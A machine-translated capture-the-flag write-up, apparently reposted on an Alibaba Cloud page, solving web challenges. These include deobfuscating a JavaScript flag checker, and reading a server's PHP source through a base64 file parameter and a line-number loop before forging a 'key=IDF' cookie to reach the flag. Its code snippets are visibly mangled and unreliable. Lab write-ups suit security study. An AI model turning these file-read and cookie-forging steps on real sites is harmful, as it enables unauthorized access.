CTF Training Camp Web Chapter

Source: Internet
Author: User
Tags base64 idf

  

Easy JS Encryption not difficult

  Problem Solving Address: here

Process: Open the source page, start analyzing JS code

Can see a lot of >.< and messy feeling (well, the great God will ignore this sentence)

First save the site as a local, in fact, there is a decoding method on the Internet, here I use the document.write (Blablablabla ...), after the change to open the file locally, do not map, copy the code on the page to replace the original JS code, Adjust the format to get the result:

    

<script type= "Text/javascript" >varA=prompt ("\u8f93\u5165\u4f60\u7684\x66\x6c\x61\x67\u5427\uff0c\u5c11\u5e74\uff01", "" ");varB= "\x66\x33\x33\x37\x33\x65\x33\x36\x63\x36\x37\x37\x37\x35\x30\x37\x37\x39\x66\x35\x64\x30\x34\x66\x66\x37\ X38\x38\x35\x62\x33\x65 ";varC=/.+_.+_.+/gi;//g match all I to case insensitivevard=0x0;varE=a.substr (0x8,0x5);////d = 0if($.MD5 (e) ==b.replace (/7/ig,++d). Replace (/8/ig,d*0x2)) {//8-12 Jiami    //d = 1        varF=a.substr (0x0/d,0x7);if(F.substr (0x5,0x2) = = "\x6a\x73" &&$.md5 (F.substr (0x0/d,d+0x3)) = = "\x64\x30\x31\x35\x34\x64\x35\x30\x34\ X38\x62\x35\x61\x35\x65\x62\x31\x30\x65\x66\x31\x36\x34\x36\x34\x30\x30\x37\x31\x39\x66\x31 ") {//5-6js 0-3WCTF//d = 1document.write ("2:" +d+ "\ n"); document.write ("A:" +a+ "\ n"); R=a.substr (0xd);//oxd=>13        //0xd = 1document.write ("RR:" +r+ "\ n"); //d = 0x1;        if(R.charcodeat (d) -0x19==r.charcodeat (++d) -0x19&&r.charcodeat (--d) -0x19==r.charcodeat (--d)) {//charCodeAt () returns the Unicode value at the specified position            //d = 3document.write ("3:" +d+ "\ n"); varG=string.fromcharcode (0x4f); G=g.tolowercase () +g.tolowercase ();//g =>oodocument.write (R.substr ((++d) *0x3,0x6) ==g.concat ("\x65\x61\x73\x79") + ""); //document.write ("G:" +g.concat ("\x65\x61\x73\x79") + "\ n");document.write (C.test (a)); if(C.test (a)) {// Easydocument.write ("4:" +d+ "\ n"); D=string (0x1) +String (a.length); document.write ("5:" +d+ "\ n"); }        }    }};if(A.substr (0x4,0x1)!=string.fromcharcode (d) | | A.substr (0x4,0x1) = = "\X7A") {alert ("\u989d\uff0c\u518d\u53bb\u60f3\u60f3\u3002\u3002")}Else{alert ("\u606d\u559c\u606d\u559c\uff01")}</script>
View Code

  Okay, next parse code ==>ok Wctf{js_jiami_xxooeasy}

Cookie Spoofing

  The topic took several days (the technology is too slag t^t)

    

  Problem Solving Address: here

Process:

Face the page a large string of garbled, the first reaction is to decode, the results probably all know ...

View URL/INDEX.PHP?LINE=&FILE=ZMXHZY50EHQ

Passed 2 values, where the file parameter value is a little bit encrypted feel, then come again! Usually the URL is Base64 encrypted, so the solution, attached to the online decryption site: here

Solve this value for flag.txt, well it seems that the directory should have other files waiting for us to visit, then try a few commonly used filenames, and finally try out is index.php base64 ciphertext AW5KZXGUCGHW, followed by the use of line this parameter , changed 1,2,3,4,5 ..... We can find that the page has PHP code appears, OK, then write a script to take this file

ImportURLLIBURL1="http://ctf.idf.cn/game/web/40/index.php?line="Url2="&FILE=AW5KZXGUCGHW"result="" forIinchRange (200): URL= Url1 + str (i) +Url2#Print URLWP =urllib.urlopen (URL) content=Wp.read ()PrintContent Result+=contentPrintResult
View Code

after getting the php file, parse, if there is a key in the cookie and corresponds to IDF, add flag.php base64 encryption and add KEY:IDF OK to Url,cookie. Wctf{idf_c00kie}

<?PHPerror_reporting(0); $file=Base64_decode(isset($_get[' File ']?$_get[' File ']: ""); $line=isset($_get[' line '])?intval($_get[' line ']): 0; if($file= = ")Header("Location:index.php?line=&file=zmxhzy50ehq"); $file _list=Array(        ' 0 ' = ' flag.txt ', ' 1 ' = ' index.php ',    ); if(isset($_cookie[' Key ']) &&$_cookie[' Key ']== ' IDF '){        $file _list[2]= ' flag.php '; }    if(In_array($file,$file _list)){        $fa=file($file); Echo $fa[$line]; }?>
View CodeAncient message encoding

  Uuencode code, just find a website to solve

Super-Simple JS problem

  Pure decoding.

Simple JS Decryption

  Well, not yet, to be continued ... Ask Daniel for the subject

A code.

  copy Paste to the console, the answer is out, you can check Jsfuck

CTF Training Camp Web Chapter

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.